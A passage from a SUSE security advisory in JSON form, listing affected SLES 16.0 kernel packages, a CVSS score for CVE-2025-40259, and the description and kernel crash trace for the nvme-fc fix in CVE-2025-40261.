"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-40259"
},
{
"cve": "CVE-2025-40261",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40261"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnvme: nvme-fc: Ensure -\u003eioerr_work is cancelled in nvme_fc_delete_ctrl()\n\nnvme_fc_delete_assocation() waits for pending I/O to complete before\nreturning, and an error can cause -\u003eioerr_work to be queued after\ncancel_work_sync() had been called. Move the call to cancel_work_sync() to\nbe after nvme_fc_delete_association() to ensure -\u003eioerr_work is not running\nwhen the nvme_fc_ctrl object is freed. Otherwise the following can occur:\n\n[ 1135.911754] list_del corruption, ff2d24c8093f31f8-\u003enext is NULL\n[ 1135.917705] ------------[ cut here ]------------\n[ 1135.922336] kernel BUG at lib/list_debug.c:52!\n[ 1135.926784] Oops: invalid opcode: 0000 [#1] SMP NOPTI\n[ 1135.931851] CPU: 48 UID: 0 PID: 726 Comm: kworker/u449:23 Kdump: loaded Not tainted 6.12.0 #1 PREEMPT(voluntary)\n[ 1135.943490] Hardware name: Dell Inc. PowerEdge R660/0HGTK9, BIOS 2.5.4 01/16/2025\n[ 1135.950969] Workqueue: 0x0 (nvme-wq)\n[ 1135.954673] RIP: 0010:__list_del_entry_valid_or_report.cold+0xf/0x6f\n[ 1135.961041] Code: c7 c7 98 68 72 94 e8 26 45 fe ff 0f 0b 48 c7 c7 70 68 72 94 e8 18 45 fe ff 0f 0b 48 89 fe 48 c7 c7 80 69 72 94 e8 07 45 fe ff \u003c0f\u003e 0b 48 89 d1 48 c7 c7 a0 6a 72 94 48 89 c2 e8 f3 44 fe ff 0f 0b\n[ 1135.979788] RSP: 0018:ff579b19482d3e50 EFLAGS: 00010046\n[ 1135.985015] RAX: 0000000000000033 RBX: ff2d24c8093f31f0 RCX: 0000000000000000\n[ 1135.992148] RDX: 0000000000000000 RSI: ff2d24d6bfa1d0c0 RDI: ff2d24d6bfa1d0c0\n[ 1135.999278] RBP: ff2d24c8093f31f8 R08: 0000000000000000 R09: ffffffff951e2b08\n[ 1136.006413] R10: ffffffff95122ac8 R11: 0000000000000003 R12: ff2d24c78697c100\n[ 1136.013546] R13: fffffffffffffff8 R14: 0000000000000000 R15: ff2d24c78697c0c0\n[ 1136.020677] FS: 0000000000000000(0000) GS:ff2d24d6bfa00000(0000) knlGS:0000000000000000\n[ 1136.028765] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n[ 1136.034510] CR2: 00007fd207f90b80 CR3: 000000163ea22003 CR4: 0000000000f73ef0\n[ 1136.041641] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000\n[ 1136.048776] DR3: 0000000000000000 DR6: 00000000fffe07f0 DR7: 0000000000000400\n[ 1136.055910] PKRU: 55555554\n[ 1136.058623] Call Trace:\n[ 1136.061074] \u003cTASK\u003e\n[ 1136.063179] ? show_trace_log_lvl+0x1b0/0x2f0\n[ 1136.067540] ? show_trace_log_lvl+0x1b0/0x2f0\n[ 1136.071898] ? move_linked_works+0x4a/0xa0\n[ 1136.075998] ? __list_del_entry_valid_or_report.cold+0xf/0x6f\n[ 1136.081744] ? __die_body.cold+0x8/0x12\n[ 1136.085584] ? die+0x2e/0x50\n[ 1136.088469] ? do_trap+0xca/0x110\n[ 1136.091789] ? do_error_trap+0x65/0x80\n[ 1136.095543] ? __list_del_entry_valid_or_report.cold+0xf/0x6f\n[ 1136.101289] ? exc_invalid_op+0x50/0x70\n[ 1136.105127] ? __list_del_entry_valid_or_report.cold+0xf/0x6f\n[ 1136.110874] ? asm_exc_invalid_op+0x1a/0x20\n[ 1136.115059] ? __list_del_entry_valid_or_report.cold+0xf/0x6f\n[ 1136.120806] move_linked_works+0x4a/0xa0\n[ 1136.124733] worker_thread+0x216/0x3a0\n[ 1136.128485] ? __pfx_worker_thread+0x10/0x10\n[ 1136.132758] kthread+0xfa/0x240\n[ 1136.135904] ? __pfx_kthread+0x10/0x10\n[ 1136.139657] ret_from_fork+0x31/0x50\n[ 1136.143236] ? __pfx_kthread+0x10/0x10\n[ 1136.146988] ret_from_fork_asm+0x1a/0x30\n[ 1136.150915] \u003c/TASK\u003e",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
